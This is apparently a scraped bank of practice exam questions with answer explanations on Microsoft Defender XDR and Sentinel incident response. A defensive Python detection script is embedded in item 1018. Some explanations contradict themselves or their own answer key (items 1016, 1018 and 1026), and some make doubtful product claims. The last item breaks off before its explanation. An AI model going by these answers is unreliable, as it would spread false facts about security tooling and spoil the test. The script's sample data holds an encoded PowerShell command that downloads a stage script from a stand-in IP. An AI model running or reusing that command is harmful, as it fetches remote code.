Your company uses Microsoft Defender XDR. During a ransomware incident, you need to isolate a compromised Windows 10 device from the network while allowing connectivity to the Microsoft Defender for Endpoint service. Which action should you take?

A.Initiate a Full isolation from the device's action menu.
B.Contain the device from the Microsoft Defender XDR portal.
C.Apply a firewall rule to block all outbound traffic.
D.Run a selective isolation to block only external connections.
AnswerA

Full isolation blocks all network traffic except to the Defender service.

Why this answer

Option A is correct because the Full isolation type in Microsoft Defender for Endpoint blocks all network traffic except to the Defender service. Option D (Selective isolation) is not a valid isolation type. Option B (Contain) is not an isolation action.

Option C (Block all traffic) would prevent the device from receiving updates and reporting to Defender.

1010
MCQmedium

Your security team receives an alert from Microsoft Defender for Endpoint indicating a suspicious PowerShell command was executed on a device. The command attempted to download a payload from a known malicious IP. After confirming the alert is a true positive, what should be your first containment step?

A.Search for similar commands across all devices using advanced hunting
B.Disable the user account in Microsoft Entra ID
C.Isolate the device from the network using Microsoft Defender for Endpoint
D.Reset the user's password
AnswerC

Isolation stops the device from communicating with the attacker and prevents lateral movement.

Why this answer

Option C is correct because immediately isolating the affected device from the network prevents lateral movement and further compromise. Option D is wrong because a password reset does not address the existing compromise. Option B is wrong because disabling the user account may not stop the malicious process already running.

Option A is wrong because searching for indicators is part of investigation, not immediate containment.

1011
MCQeasy

A SOC analyst wants to ingest firewall logs from a Palo Alto Networks appliance into Microsoft Sentinel using the Common Event Format (CEF) connector. The analyst has already set up a Linux syslog forwarder. What is the next required step to complete the data ingestion?

A.Install the Azure Monitor Agent on the Linux forwarder.
B.Run the installation script provided by the Sentinel CEF connector page on the Linux forwarder.
C.Create a Syslog data connector in Sentinel and specify the Palo Alto facility.
D.Enable Azure Arc on the firewall appliance.
AnswerB

This script configures the forwarder to listen for CEF messages and forward them to Sentinel.

Why this answer

The CEF connector for Palo Alto Networks in Microsoft Sentinel requires a Linux syslog forwarder to have the CEF agent installed and configured. The installation script provided on the Sentinel CEF connector page automates the setup of the Log Analytics agent (formerly OMS agent) with the correct syslog daemon configuration to parse and forward CEF-formatted logs. Since the forwarder is already deployed, running this script is the immediate next step to enable log ingestion.

Exam trap

The trap here is that candidates confuse the CEF connector's agent installation step with the Azure Monitor Agent (AMA) or think that creating the data connector in the portal alone is sufficient, when in fact the Linux forwarder must first run the CEF installation script to enable log parsing and forwarding.

How to eliminate wrong answers

Option A is wrong because the Azure Monitor Agent (AMA) is not used for the CEF connector; the CEF connector relies on the legacy Log Analytics agent (OMS agent) installed via the CEF installation script. Option C is wrong because creating a Syslog data connector in Sentinel is a separate step that configures the data source in the portal, but it does not install or configure the forwarder; the installation script must be run first to set up the agent on the Linux machine. Option D is wrong because Azure Arc is not required for CEF log ingestion; the firewall appliance sends syslog to the Linux forwarder, and the forwarder communicates directly with the Log Analytics workspace without needing Azure Arc.

1012
MCQeasy

Your organization is implementing Microsoft Sentinel. You need to design a solution to automatically disable a user account in Microsoft Entra ID when a high-severity incident is triggered in Microsoft Sentinel related to that user. Which component should you use?

A.A playbook that uses the Microsoft Graph API to disable the user.
B.An analytics rule that includes a query to disable the user.
C.An automation rule that runs a PowerShell script on a hybrid worker.
D.A workbook that triggers a webhook to disable the user.
AnswerA

Playbooks can automate response actions like disabling a user.

Why this answer

A playbook is the correct component because it is an automated workflow that can be triggered by a Microsoft Sentinel incident. By using the Microsoft Graph API within the playbook, you can programmatically disable a user account in Microsoft Entra ID, which is the required action for a high-severity incident. This aligns with the need for an automated response that integrates Sentinel with identity management.

Exam trap

The trap here is that candidates may confuse automation rules with playbooks, thinking that automation rules can directly execute scripts or API calls, when in fact automation rules only trigger playbooks or run actions like changing incident status, not performing external remediation.

How to eliminate wrong answers

Option B is wrong because an analytics rule is designed to generate alerts based on query results, not to execute remediation actions like disabling a user; it lacks the capability to perform API calls or modify Entra ID objects. Option C is wrong because an automation rule in Sentinel can trigger a playbook or run a script on a hybrid worker, but running a PowerShell script directly on a hybrid worker does not natively integrate with Microsoft Graph API to disable a user without additional custom logic; the standard pattern is to use a playbook for such actions. Option D is wrong because a workbook is a visualization tool for data analysis and reporting; it cannot trigger webhooks or execute actions to disable user accounts.

1013
MCQeasy

Your organization uses Microsoft Sentinel. An incident is created for a possible data exfiltration via an unapproved external IP address. Which type of Microsoft Sentinel automation should you use to automatically block the IP address in the firewall?

A.Data connector.
B.Analytics rule.
C.Watchlist.
D.Playbook.
AnswerD

Playbooks automate response actions; they can be triggered from automation rules to block IPs.

Why this answer

An automation rule in Microsoft Sentinel can trigger a playbook (based on Azure Logic Apps) when an incident is created. The playbook can then block the IP. Data connectors ingest data, watchlists are for reference, and analytics rules create alerts.

1014
MCQhard

Your organization has Microsoft Defender for Endpoint deployed. You need to configure automatic attack disruption for ransomware attacks. What should you enable?

A.Attack surface reduction rules.
B.Live Response capabilities.
C.Device discovery settings.
D.Automatic attack disruption in Microsoft 365 Defender.
AnswerD

This feature automatically contains compromised assets during active attacks.

Why this answer

Automatic attack disruption in Microsoft 365 Defender is the correct feature to enable because it uses advanced detection signals to automatically contain compromised assets during ransomware attacks, such as isolating devices or blocking accounts, without manual intervention. This capability is specifically designed to stop the spread of ransomware in real time by leveraging Microsoft's threat intelligence and behavioral analytics.

Exam trap

The trap here is that candidates often confuse preventive controls like Attack surface reduction rules with reactive automated response capabilities, assuming that blocking malware execution is equivalent to disrupting an active attack, but automatic attack disruption is a distinct, post-breach containment feature.

How to eliminate wrong answers

Option A is wrong because Attack surface reduction rules are a set of policies that block common malware behaviors (e.g., script execution, Office macro abuse) but do not provide automatic containment of an ongoing ransomware attack; they are preventive, not reactive. Option B is wrong because Live Response capabilities allow security analysts to remotely investigate and remediate devices via a command-line interface, but they require manual initiation and do not automatically disrupt attacks. Option C is wrong because Device discovery settings control how endpoints are identified and inventoried on the network (e.g., via passive or active scanning), which is unrelated to automatic attack disruption.

1015
MCQeasy

An organization uses Microsoft Sentinel. A security engineer needs to set up automatic response actions when a high-severity incident is created. The engineer wants to trigger a playbook that sends a notification to a Microsoft Teams channel and creates a ticket in ServiceNow. What should the engineer use?

A.An automation rule that triggers a playbook
B.An analytics rule with incident creation enabled
C.A watchlist to detect the incident
D.A workbook with a custom alert
AnswerA

Automation rules are designed to run playbooks in response to incident creation or update.

Why this answer

Option A is correct because automation rules in Microsoft Sentinel can trigger playbooks (Azure Logic Apps) when incidents are created or updated. Option B is wrong because analytics rules create alerts, not incidents directly. Option D is wrong because workbooks are for visualization, not automation.

Option C is wrong because watchlists are for correlation, not automated response.

1016
Multi-Selecteasy

Which TWO are valid methods to collect forensic evidence from a compromised Windows endpoint during an incident? (Choose TWO.)

Select 2 answers
A.Run Windows Update to fix vulnerabilities.
B.Reboot the system and boot from a forensic USB drive.
C.Use FTK Imager to create a forensically sound image of the hard drive.
D.Run KAPE (Kroll Artifact Parser and Extractor) to collect artifacts.
E.Take a memory dump using DumpIt or similar tool.
AnswersD, E

KAPE collects forensic artifacts without altering the system.

Why this answer

Option D is correct because KAPE collects live forensic data. Option E is correct because a memory dump captures volatile data. Option B is wrong because it overwrites data.

Option A is wrong because Windows Update is not a forensic tool. Option C is wrong because it is for disk imaging after shutdown.

1017
Multi-Selectmedium

Which THREE data sources can be used in Microsoft Sentinel for threat hunting involving network traffic?

Select 3 answers
A.DeviceNetworkEvents
B.CommonSecurityLog
C.WireData
D.SigninLogs
E.OfficeActivity
AnswersA, B, C

Endpoint network events from Defender for Endpoint.

Why this answer

Options A, B, and C are correct. A is correct because DeviceNetworkEvents from Microsoft Defender for Endpoint contains network events. B is correct because CommonSecurityLog (Syslog) contains network device logs.

C is correct because WireData logs network traffic from Azure VMs. D is incorrect because SigninLogs is for authentication, not network traffic. E is incorrect because OfficeActivity is for Office 365 logs.

1018
MCQhard

You run the above KQL query in Microsoft Sentinel to detect encoded PowerShell commands. The query returns no results, even though you know that some devices have executed encoded PowerShell commands. What is the most likely reason?

A.The DecodedCommand column is empty because the ProcessCommandLine does not contain an encoded command.
B.The base64_decode_tostring function cannot decode PowerShell encoded commands.
C.The query only looks for 'powershell.exe', but the command might have been run using 'pwsh.exe' or 'powershell_ise.exe'.
D.The DeviceProcessEvents table does not contain PowerShell process events.
AnswerC

PowerShell Core uses pwsh.exe, and PowerShell ISE uses powershell_ise.exe.

Why this answer

Option C is correct because the query filters on FileName == 'powershell.exe' exactly, but the process might be named 'powershell_ise.exe' or 'pwsh.exe' (PowerShell Core). Option B is wrong because base64_decode_tostring should decode properly if the command is base64-encoded. Option A is wrong because the query does not filter by -EncodedCommand; it uses contains to check whether the decoded command contains '-EncodedCommand', which is incorrect logic.

Option D is wrong because the query uses the DeviceProcessEvents table, which should capture process events.
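The detection logic described above, written as an added example (not code from the question bank): it matches every PowerShell host rather than only powershell.exe, accepts the abbreviated forms of -EncodedCommand that PowerShell allows, and decodes the value as UTF-16LE, which is how PowerShell encodes the script text. The DeviceProcessEvents rows are constructed for the demo; the column names match the table, the device names and script contents are invented.

```python
"""Hunt for encoded PowerShell launches across all PowerShell host binaries.

Added example for the question above; not code from the source page.
The sample DeviceProcessEvents rows below are constructed for this demo.
"""
import base64
import re
from typing import Optional

# Every binary that can run an encoded command. Filtering on
# FileName == 'powershell.exe' alone (the defect in the question) misses the rest.
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en,
# -enc, ...). The value is Base64 of the UTF-16LE encoded script text.
# '-ex...' (ExecutionPolicy) and '-ea' (ErrorAction) do not match this pattern.
ENCODED_ARG = re.compile(
    r"(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/]{16,}={0,2})",
    re.IGNORECASE,
)

# Cmdlets and types commonly seen in decoded download-and-execute scripts.
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "net.webclient")


def encode_command(script: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode an -EncodedCommand value; returns None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def extract_encoded_command(event: dict) -> Optional[dict]:
    """Return a hit for an event that launches any PowerShell host with an encoded
    command, or None when the row does not qualify."""
    if event.get("FileName", "").lower() not in POWERSHELL_HOSTS:
        return None
    match = ENCODED_ARG.search(event.get("ProcessCommandLine", ""))
    if not match:
        return None
    decoded = decode_encoded_command(match.group(1))
    if decoded is None:
        return None
    lowered = decoded.lower()
    return {
        "DeviceName": event["DeviceName"],
        "FileName": event["FileName"],
        "DecodedCommand": decoded,
        # Second-stage triage on the decoded text, not on the raw command line.
        "Downloader": any(marker in lowered for marker in DOWNLOAD_MARKERS),
    }


def hunt(events) -> list:
    """Run the extraction over a sequence of DeviceProcessEvents-like rows."""
    return [hit for e in events if (hit := extract_encoded_command(e))]


# Constructed sample rows: three encoded launches across the three hosts,
# one plain launch using -ExecutionPolicy, and one non-PowerShell process.
SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand "
                           + encode_command("Get-Process | Out-File C:\\temp\\p.txt")},
    {"DeviceName": "ws02", "FileName": "pwsh.exe",
     "ProcessCommandLine": "pwsh.exe -nop -enc "
                           + encode_command("Invoke-WebRequest http://192.0.2.10/stage.ps1 -OutFile s.ps1")},
    {"DeviceName": "ws03", "FileName": "powershell_ise.exe",
     "ProcessCommandLine": "powershell_ise.exe -e " + encode_command("Write-Output 'hello'")},
    {"DeviceName": "ws04", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"DeviceName": "ws05", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c echo " + encode_command("not powershell")},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["DeviceName"], hit["FileName"], hit["Downloader"], repr(hit["DecodedCommand"]))
```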

1019
MCQmedium

Refer to the exhibit. You are configuring an automation rule in Microsoft Sentinel to block IP addresses from high-severity incidents. The rule triggers on incident creation but fails to block the IP. What is the most likely cause?

A.The trigger type should be 'alertTrigger' instead of 'incidentTrigger'
B.The entity path 'incident.entities.IP' is incorrect; it needs to iterate over entities
C.The action type 'blockIP' is not supported in automation rules
D.The severity condition should be 'GreaterThan' instead of 'Equals'
AnswerB

Entities are an array; the correct path would involve a loop or index.

Why this answer

Option B is correct because the JSON uses 'incident.entities.IP', but the actual path likely requires iterating over the entities; the syntax is incorrect. Option D is wrong because the severity condition is correct. Option A is wrong because there is no inconsistency; the trigger type is incidentTrigger.

Option C is wrong because blockIP is a valid action type in automation rules.

1020
MCQeasy

Your incident response team uses Microsoft Sentinel. You need to automatically assign incidents to the appropriate analyst based on the type of alert. What should you create?

A.An automation rule with an 'Assign owner' action
B.A playbook that runs when an incident is created
C.A watchlist containing analyst names
D.A hunting bookmark to track assignments
AnswerA

Automation rules can directly assign incidents to an owner.

Why this answer

Automation rules in Microsoft Sentinel allow you to define conditions (e.g., alert type) and corresponding actions, including 'Assign owner' to automatically route incidents to the appropriate analyst. This is the native, no-code mechanism for incident assignment based on alert properties, making it the correct choice for this requirement.

Exam trap

The trap here is that candidates often confuse playbooks (which can also assign owners via a Microsoft Teams or Azure Logic Apps connector) with the simpler, purpose-built automation rule action, leading them to choose the more complex option unnecessarily.

How to eliminate wrong answers

Option B is wrong because playbooks are designed for complex, multi-step automation (e.g., enrichment, remediation) and require additional logic to assign ownership, whereas automation rules provide a simpler, direct 'Assign owner' action. Option C is wrong because a watchlist is a static reference list used for correlation or enrichment, not a mechanism to automatically assign incidents to analysts. Option D is wrong because a hunting bookmark is used to save and track interesting queries or results during threat hunting, not to manage incident assignments.

1021
Multi-Selectmedium

Which THREE components are part of the Microsoft Defender XDR incident management process?

Select 3 answers
A.Entities
B.Alerts
C.User settings
D.Playbooks
E.Evidence
AnswersA, B, E

Entities like users, devices, IPs are linked to incidents.

Why this answer

Entities are a core component of the Microsoft Defender XDR incident management process because they represent the assets (such as users, devices, mailboxes, and applications) that are involved in an incident. The incident graph automatically links related entities to provide a unified view of the attack story, enabling analysts to pivot from an alert to the affected resources for investigation and response.

Exam trap

The trap here is that candidates often confuse the components of the Microsoft Defender XDR incident management process (entities, alerts, evidence) with automation features like playbooks, which belong to Microsoft Sentinel, not Defender XDR.

1022
MCQmedium

You are a SOC analyst investigating a high-severity incident. The incident involves a user who received a phishing email and clicked a link. Microsoft Defender for Office 365 detected the email as phishing and blocked the URL at time of click, but a follow-up investigation reveals that the user's mailbox has suspicious forwarding rules. You need to ensure that similar incidents are automatically remediated in the future. What should you configure in Microsoft Sentinel?

A.Configure entity behavior analytics to automatically block the user.
B.Create an analytics rule that detects suspicious forwarding rules and automatically removes them.
C.Create an automation rule that triggers a playbook to remove the forwarding rule when an incident with the 'Phishing' tactic is created.
D.Add the user to a watchlist that triggers an automated investigation.
AnswerC

Automation rules can trigger playbooks that perform remediation actions like removing forwarding rules.

Why this answer

Automation rules in Microsoft Sentinel allow you to automatically trigger playbooks (e.g., to remove forwarding rules) when incidents are created. Option C is correct because automation rules can invoke a playbook that removes the forwarding rule. Option B is wrong because analytics rules create alerts, not automated actions on incidents.

Option D is wrong because watchlists are for reference data, not automation. Option A is wrong because entity behavior analytics is for detecting anomalies, not automated remediation.

1023
MCQmedium

Your organization uses Microsoft Sentinel with the Microsoft Defender XDR connector to ingest alerts and incidents from Defender for Endpoint, Defender for Office 365, and Defender for Identity. As a threat hunter, you want to proactively search for devices that may be communicating with known malicious IP addresses that have not yet triggered an alert. You have a list of known malicious IP addresses from an external threat intelligence feed. Which approach should you take to perform this hunt efficiently?

A.Create a Logic App that runs hourly and checks each IP against DeviceNetworkEvents, then creates incidents.
B.Create a Watchlist in Microsoft Sentinel containing the IP addresses, then write a KQL query in the Hunting blade that joins the Watchlist with DeviceNetworkEvents from Defender for Endpoint.
C.Use the ThreatIntelligenceIndicator table in Microsoft Sentinel, which automatically ingests the feed if you configure a Threat Intelligence - TAXII connector.
D.Manually add each IP address as a custom detection rule in Microsoft Sentinel for each device.
AnswerB

Watchlists allow efficient joining in queries without hardcoding.

Why this answer

Option B is the most efficient: create a Watchlist in Sentinel with the IP list, then use KQL to join it with DeviceNetworkEvents. Option D is inefficient for large lists; Option C uses the wrong connector; Option A is for automation, not hunting.

1024
MCQhard

You are a threat hunter at Contoso, a multinational company with 10,000 employees. Your production environment includes: Microsoft 365 E5 licenses; Microsoft Sentinel in a central Log Analytics workspace; Microsoft Defender for Endpoint, Office 365, Identity, and Cloud Apps; and Microsoft Entra ID P2. You are tasked with hunting for a potential advanced persistent threat (APT) that may have compromised a high-privilege account. The threat intelligence team has reported that the APT group uses living-off-the-land binaries (LOLBins) to execute malicious code and uses encrypted tunnels to C2 servers. You need to design a hunting query in Microsoft Sentinel that correlates multiple data sources to identify suspicious LOLBin usage combined with unusual network connections. Which approach should you take?

A.Create a KQL query in Microsoft Sentinel that joins DeviceProcessEvents with DeviceNetworkEvents on DeviceId and a 1-minute time window, filtering for LOLBin processes and external IP connections.
B.Use the 'DeviceNetworkEvents' table alone to find connections to known malicious IPs from the threat intelligence feed.
C.Run a query in Advanced hunting that filters DeviceProcessEvents for known LOLBin file names like 'rundll32.exe' and 'mshta.exe', then manually review each instance.
D.Set up a custom detection rule in Microsoft Defender for Endpoint to alert on any LOLBin execution, then investigate the alerts.
AnswerA

This correlates process execution with network connections, identifying potential C2 activity.

Why this answer

Option A is correct because the KQL query joins DeviceProcessEvents and DeviceNetworkEvents on DeviceId and timestamp to find processes with suspicious command lines followed by network connections to external IPs. Option C is wrong because it does not correlate processes with network connections. Option B is wrong because it uses only network data without process context.

Option D is wrong because it focuses only on alerts, missing proactive hunting.

1025
MCQhard

A security analyst is investigating a sophisticated attack that involved multiple devices. The analyst needs to create a custom detection rule in Microsoft 365 Defender that triggers when a process with a specific SHA256 hash is executed on any device AFTER an attacker-controlled file is created on another device. Which approach should the analyst use to build this detection?

A.Create a custom detection rule using an advanced hunting query that joins DeviceFileEvents and DeviceProcessEvents, and schedule it in Microsoft 365 Defender.
B.Use the Microsoft 365 Defender incident creation rule to generate an incident when the behavior is observed.
C.Use Microsoft Sentinel analytics rules with a data connector to Microsoft 365 Defender.
D.Use Microsoft Defender for Cloud's workload protection alerts.
AnswerA

Correct. Custom detection rules allow complex multi-table and multi-device correlations using KQL, and they can alert when specific sequences occur, such as a file creation followed by process execution.

Why this answer

Option A is correct because the requirement is to correlate two distinct events (file creation on one device and process execution on another) across time and devices. An advanced hunting query in Microsoft 365 Defender can join DeviceFileEvents and DeviceProcessEvents tables using a common indicator (e.g., attacker-controlled file hash) and schedule the query as a custom detection rule. This is the only native Microsoft 365 Defender approach that supports multi-device, multi-event correlation with scheduled evaluation.

Exam trap

The trap here is that candidates often confuse incident creation rules (which only react to existing alerts) with custom detection rules (which can query raw telemetry), leading them to select Option B despite its inability to perform cross-table joins.

How to eliminate wrong answers

Option B is wrong because incident creation rules in Microsoft 365 Defender only trigger on existing alerts or incidents, not on raw telemetry; they cannot perform multi-table joins or detect custom behavioral sequences. Option C is wrong because while Microsoft Sentinel can ingest Microsoft 365 Defender data and create analytics rules, the question explicitly asks for a detection built within Microsoft 365 Defender, not a separate SIEM. Option D is wrong because Microsoft Defender for Cloud's workload protection alerts focus on cloud infrastructure and resource-level threats, not on device-level process and file events across endpoints.

1026
MCQmedium

Your organization uses Microsoft Sentinel with custom analytics rules. During a threat hunt, you want to identify lateral movement using pass-the-hash techniques. Which data source combination is most effective?

A.Azure AD sign-in logs and Office 365 audit logs
B.DeviceEvents and DeviceLogonEvents from Microsoft Defender for Endpoint
C.Sysmon Event ID 3 (Network connect) and Windows Firewall logs
D.Windows Security Event ID 4624 (Logon) with LogonType 3 and NTLM attributes
AnswerD

Event 4624 with LogonType 3 and NTLM can indicate pass-the-hash.

Why this answer

Option D is correct because Windows Event ID 4624 (logon) with logon type 3 (network) and NTLM authentication helps detect pass-the-hash. Option A is wrong because Azure AD sign-in logs cover cloud sign-ins, not on-premises lateral movement. Option C is wrong because Sysmon Event ID 3 records network connections, not authentication.

Option B is wrong because SecurityEvent is the correct table; DeviceEvents comes from Microsoft Defender for Endpoint and is less detailed for NTLM.

1027
MCQmedium

Your organization uses Microsoft Sentinel and Microsoft Defender XDR. You want to automatically isolate a device when a high-severity incident is created. What is the most efficient way to achieve this?

A.Manually isolate the device from the Microsoft Defender for Endpoint console after the incident is created.
B.Create an automation rule in Microsoft Sentinel that runs a PowerShell script to isolate the device.
C.Create a custom detection rule in Microsoft Defender XDR that triggers device isolation.
D.Create an automation rule in Microsoft Sentinel that triggers a playbook, which uses the Microsoft Defender for Endpoint connector to isolate the device.
AnswerD

This is the most efficient integrated approach.

Why this answer

Option D is correct because Microsoft Sentinel automation rules can run a playbook that isolates the device via the Microsoft Defender for Endpoint connector. Option B is wrong because automation rules cannot directly run scripts. Option C is wrong because a custom detection rule in Defender does not integrate with Sentinel incident creation.

Option A is wrong because manual isolation is not automatic.

1028
MCQhard

During a threat hunt in Microsoft Defender XDR, an analyst discovers that a specific user account has been executing unusual PowerShell commands from a non-corporate device. The analyst wants to investigate the timeline of these activities across all Microsoft 365 services. Which advanced hunting schema should be used to correlate these events?

A.DeviceEvents
B.CloudAppEvents
C.EmailEvents
D.IdentityLogonEvents
AnswerD

This table contains logon events with device and user information, enabling cross-service correlation.

Why this answer

The IdentityLogonEvents table in advanced hunting captures authentication events, including device and user details, which is essential for correlating activities across services. Option A (DeviceEvents) is for endpoint processes, not logon correlation. Option C (EmailEvents) is for email tracking.

Option B (CloudAppEvents) covers cloud app activities but not logon context.

1029
MCQhard

Match each Microsoft Sentinel analytics rule type to its correct description.

A.Scheduled → Runs a KQL query on a schedule and generates alerts based on the query results.; Fusion → Correlates multiple high-fidelity alerts from various sources to create a single, comprehensive incident.; Anomaly → Uses machine learning to identify unusual patterns in activity by analyzing entity behavior over time.; Microsoft Security → Creates incidents from alerts generated by Microsoft security products such as Microsoft Defender for Endpoint.
B.The first and last mappings are swapped.
C.Every item maps to the same log table or feature category.
D.Only identity-related items are mapped; workload and network items are omitted.
AnswerA

This is the correct mapping based on the documented function of each item.

Why this answer

Option A is correct because it accurately describes the four distinct Microsoft Sentinel analytics rule types. Scheduled rules execute KQL queries at defined intervals to generate alerts based on query results. Fusion rules use advanced machine learning to correlate multiple high-fidelity alerts from different sources into a single incident, reducing alert fatigue.

Anomaly rules leverage machine learning to detect unusual patterns by analyzing entity behavior over time. Microsoft Security rules automatically create incidents from alerts generated by Microsoft security products like Microsoft Defender for Endpoint, integrating native security signals.

Exam trap

The trap here is that candidates often confuse the 'Fusion' rule type with 'Microsoft Security' rules, thinking Fusion only correlates Microsoft security alerts, when in fact Fusion correlates alerts from any source (including third-party) and uses ML, while Microsoft Security rules specifically handle native Microsoft security product alerts without ML correlation.

How to eliminate wrong answers

Option B is wrong because it claims the first and last mappings are swapped, which would incorrectly assign the 'Microsoft Security' description to the 'Scheduled' rule type and vice versa; however, the descriptions in Option A are correctly matched, so swapping them would break the accurate mapping. Option C is wrong because it suggests every item maps to the same log table or feature category, which is false; each rule type targets different data sources and purposes—Scheduled uses custom KQL queries, Fusion correlates alerts from multiple sources, Anomaly analyzes entity behavior, and Microsoft Security ingests alerts from Defender products. Option D is wrong because it states only identity-related items are mapped and workload/network items are omitted; in reality, Microsoft Sentinel rule types cover a broad range of telemetry including network, workload, and identity data, and the descriptions in Option A correctly include all relevant categories.

1030
MCQeasy

A security analyst is investigating a potential phishing campaign and has identified a malicious attachment with a known SHA256 hash. The analyst needs to find all email messages that were delivered to users and contained this exact attachment. Which advanced hunting table should the analyst query to obtain the network message IDs of the relevant emails?

A.EmailEvents
B.EmailAttachmentInfo
C.EmailUrlInfo
D.EmailPostDeliveryEvents
AnswerB

EmailAttachmentInfo includes the SHA256 hash of each attachment and the NetworkMessageId of the email.

Why this answer

The EmailAttachmentInfo table in Microsoft 365 Advanced Hunting contains records of every attachment in email messages, including the SHA256 hash. By querying this table with the known hash, the analyst can retrieve the NetworkMessageId values for all emails that contained that specific malicious attachment, enabling further investigation into delivery and impact.

Exam trap

The trap here is that candidates often confuse EmailEvents (which has delivery status) with EmailAttachmentInfo (which has attachment hashes), failing to recognize that only the latter contains the SHA256 hash needed to match a known malicious file.

How to eliminate wrong answers

Option A is wrong because EmailEvents contains metadata about email delivery events (e.g., delivery status, sender, recipient) but does not include attachment-level details like SHA256 hashes. Option C is wrong because EmailUrlInfo stores information about URLs present in email bodies or attachments, not attachment file hashes. Option D is wrong because EmailPostDeliveryEvents records actions taken on emails after delivery (e.g., user clicks, ZAP actions) and does not contain attachment hash data.

1031
Multi-Selecteasy

Your organization plans to use Microsoft Sentinel for incident management. Which TWO are native incident management features in Sentinel?

Select 2 answers
A.Incident comments and collaboration
B.Incident assignment to specific analysts
C.Automated email notifications on incident creation
D.Integration with ServiceNow via out-of-the-box connector
E.Integration with Microsoft Teams for incident chat
AnswersA, B

Sentinel supports comments on incidents.

Why this answer

Options A and B are correct because Sentinel supports incident comments and assignment to analysts. Options C and D are not native features; Option E is not part of incident management.

1032
MCQmedium

A SOC team uses Microsoft Sentinel and wants to automatically enrich incidents with threat intelligence from a third-party feed. Which feature should they configure to ingest the threat intelligence and correlate it with alerts?

A.Analytics rules
B.Threat intelligence connectors
C.Data connectors
D.Watchlists
AnswerB

These connectors import TI indicators and enable matching.

Why this answer

The correct answer is B. Threat intelligence connectors in Microsoft Sentinel allow ingestion of TI feeds and enable correlation with alerts. The other options do not provide this capability.

1033
MCQmedium

A SOC analyst suspects a user account is compromised based on anomalous sign-in activity detected by Microsoft Entra ID Protection. The analyst needs to confirm and contain the threat. What is the first action the analyst should take?

A.Reset the user's password immediately
B.Review the user's risk level and sign-in logs in Microsoft Entra ID Protection
C.Disable the user account in Microsoft Entra ID
D.Block the user's sign-in from all locations
AnswerB

First confirm the compromise by reviewing risk and logs.

Why this answer

Option B is correct because the first step when investigating a potential account compromise is to review the user's risk level and sign-in logs in Microsoft Entra ID Protection. This allows the analyst to confirm the threat by examining risk detections, sign-in patterns, and contextual details before taking any containment actions. Prematurely resetting passwords or disabling accounts could disrupt legitimate user activity or alert the attacker without a full understanding of the scope.

Exam trap

The trap here is that candidates often jump to containment actions like resetting passwords or disabling accounts, but the SC-200 exam emphasizes the 'investigate before remediate' principle, where reviewing risk detections and sign-in logs in Entra ID Protection is the mandatory first step to confirm the threat.

How to eliminate wrong answers

Option A is wrong because resetting the user's password immediately without first reviewing the risk level and sign-in logs may lock out a legitimate user or fail to address the root cause, such as a token theft or MFA bypass. Option C is wrong because disabling the user account in Microsoft Entra ID is a containment step that should only be taken after confirming the compromise through risk investigation, as it could cause unnecessary service disruption. Option D is wrong because blocking the user's sign-in from all locations is a reactive containment measure that should follow confirmation of the threat, not precede it, and may not address risks like leaked credentials or session hijacking.

1034
MCQmedium

Refer to the exhibit. A security analyst runs the KQL query in Microsoft Defender XDR to find devices running encoded PowerShell commands in the last hour. The query returns results showing a device named 'DESKTOP-123' with account 'jdoe'. The analyst suspects malicious activity. Which immediate next step should the analyst take?

A.Delete the query because it returned results
B.Modify the query to increase the time range to 24 hours
C.Click on the result to open the full device timeline and analyze the process tree
D.Isolate the device 'DESKTOP-123' from the network
AnswerC

Investigating the timeline provides context on parent processes and related events.

Why this answer

Option C is correct because the analyst should investigate the device further to understand the context of the encoded command. Option D is wrong because isolating without investigation may be premature. Option B is wrong because extending the time range does not help with this specific incident.

Option A is wrong because the query is valid and has already run.

1035
Multi-Selectmedium

Which TWO actions are appropriate when responding to a confirmed data exfiltration incident via email?

Select 2 answers
A.Block the recipient domain on the email gateway
B.Place a legal hold on the user's mailbox
C.Disable the user's account immediately
D.Delete all sent items from the user's mailbox
E.Run a full antivirus scan on the user's device
AnswersA, B

Prevents further emails to that domain.

Why this answer

Appropriate actions are to block the recipient domain and place a legal hold on the mailbox. Disabling the user account might be premature. Scanning the device does not address the email channel used for exfiltration.

Deleting sent items destroys forensic evidence.

1036
MCQhard

Fabrikam uses Microsoft Sentinel, Microsoft Defender XDR, and Microsoft Purview Compliance Manager. An incident is generated: 'Insider risk - user deleting large volumes of files from SharePoint Online.' The incident is from Microsoft Purview Insider Risk Management. The user is a senior executive, and disabling the account is not an option without board approval. You need to contain the data deletion. Which of the following is the BEST immediate action?

A.Remove the user's permissions to the SharePoint sites.
B.Block the user's access in Microsoft Entra ID temporarily.
C.Apply a retention hold to the user's OneDrive and SharePoint sites.
D.Create a DLP policy to block deletion of files.
AnswerC

Preserves data without disrupting user access.

Why this answer

Option C is correct: applying a retention hold to the user's OneDrive and SharePoint sites preserves the data without affecting the user's access. Option B is wrong: blocking the user disrupts work. Option A is wrong: removing permissions may not stop the deletion if the user is the owner.

Option D is wrong: creating a DLP policy does not stop deletion that is already under way.

1037
MCQmedium

Your organization uses Microsoft Defender XDR. A user reports that their device is behaving erratically, with unexpected pop-ups and high CPU usage. You suspect malware infection. You need to collect forensic data from the device for analysis. What should you do?

A.Create a custom detection rule in Microsoft Defender for Endpoint to capture the behavior.
B.Offboard the device and re-onboard it to trigger a fresh investigation.
C.Initiate a live response session on the device from the Microsoft 365 Defender portal.
D.Run a full antivirus scan using Microsoft Defender Antivirus.
AnswerC

Live response provides remote shell access to collect forensic artifacts.

Why this answer

